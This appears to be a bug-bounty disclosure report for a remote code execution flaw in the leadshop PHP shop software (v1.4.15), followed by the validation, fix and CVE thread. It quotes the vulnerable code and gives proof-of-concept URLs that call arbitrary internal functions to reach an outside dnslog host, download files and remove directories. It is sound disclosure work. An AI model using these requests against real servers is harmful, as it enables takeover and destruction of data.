There is an RCE vulnerability in qmpaas/leadshop

Valid

Reported on

Nov 7th 2022


Description

There is an RCE vulnerability in qmpaas/leadshop (https://github.com/qmpaas/leadshop) (v1.4.15). An attacker can access the file leadshop.php and call any existing function through GET to control the target host.
The vulnerability is in the leadshop/web/leadshop.php[27-61] file

    public function run()
    {
        //读取参数数据
        $include = isset($_GET['include']) ? $_GET['include'] : "";
        $data    = isset($_GET['data']) ? $_GET['data'] : "";
        $meta    = isset($_GET['meta']) ? $_GET['meta'] : "";
        //执行数据方法
        if ($include) {
            return call_user_func_array([$this, $include], [$meta, $data]);
        } else {
            //用于判断是否非法操作
            $token = isset($_GET['token']) ? $_GET['token'] : "";
            $html  = get_oss_url('index.html');
            //判断锁文件是否存在,存在则是要执行更新
            if (@file_exists(dirname(__DIR__) . "/install.lock")) {
                if (@file_get_contents(dirname(__DIR__) . "/install.lock") === $token) {
                    if (!isset($_SESSION['self_update'])) {
                        //执行更新自身
                        $this->SilentSelfUpdate();
                    }
                    //执行更新操作
                    $version = get_version();
                    $body    = $this->DownloadFile($html);
                    echo str_replace('{$version}', $version, $body);
                } else {
                    die("检测到非法Token,请登录后台进入更新界面");
                }
            } else {
                $version = get_version();
                $body    = $this->DownloadFile($html);
                echo str_replace('{$version}', $version, $body);
            }
        }

    }

The call_user_func_array function is used directly, and $include, $data, and $meta receive get parameters, which allows us to run all functions in this file (parameters less than or equal to 2), such as:
HttpGet (http access: poc: https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn),
ToMkdir (create folder: poc: https://demo.leadshop.vip/leadshop.php?include=ToMkdir&meta=1),
UpdateSql (perform database update: poc: https://demo.leadshop.vip/leadshop.php?include=UpdateSql),
DownloadFile (download file: poc: https://demo.leadshop.vip/leadshop.php?include=DownloadFile&meta=www.baidu.com/img/flexible/logo/pc/peak-result.png)
RemoveDir (remove directory: poc: https://demo.leadshop.vip/leadshop.php?include=RemoveDir&meta=[path])

Proof of Concept:

Poc:

https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn  

DNSLOG picture:
img

Impact

Attackers can call any existing functions at will, control the target server to access, download, create files, delete files, etc.
Access may make the server a dos server.
Download, so that an attacker can download the PHP Trojan to the server.
Creating and deleting will destroy normal services.
More than ten IPs are using this service.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
ouroborosscr modified the report
a year ago
ouroborosscr modified the report
a year ago
ouroborosscr modified the report
a year ago
ouroborosscr modified the report
a year ago
ouroborosscr
a year ago

Researcher


Hi,@admin.Thanks.Could you please contact maintainer?

We have contacted a member of the qmpaas/leadshop team and are waiting to hear back a year ago
ouroborosscr
a year ago

Researcher


Hi,@admin Can I contact maintainer to agree to assign a CVE?Thanks.

ouroborosscr modified the report
a year ago
ouroborosscr modified the report
a year ago
ouroborosscr modified the report
a year ago
Pavlos
a year ago

Admin


Hey👋 Before a CVE can be assigned the maintainer first has to validate your report and fix the vulnerability. At that point they will be asked if they want to assign a CVE just before they go public with the disclosure.

leadshop开源商城
a year ago

Maintainer


Great work @ouroborosscr 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.

leadshop开源商城 validated this vulnerability a year ago
ouroborosscr has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
ouroborosscr submitted a
a year ago
leadshop开源商城 gave praise a year ago
thinks
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
leadshop开源商城 marked this as fixed in 1.4.16 with commit f27e9c a year ago
ouroborosscr has been awarded the fix bounty
ouroborosscr
a year ago

Researcher


@admin can we assign a CVE here?

ouroborosscr
a year ago

Researcher


@admin I contact maintainer to agree to assign a CVE. He said"I did it. See if it's right?" "The first time I used this platform." The first time I used this platform. Thanks.

ouroborosscr
a year ago

Researcher


@admin I contact maintainer to agree to assign a CVE. He said"I did it. See if it's right?" "The first time I used this platform." Please help us finish the work. Thanks.

This vulnerability has now been published a year ago
to join this conversation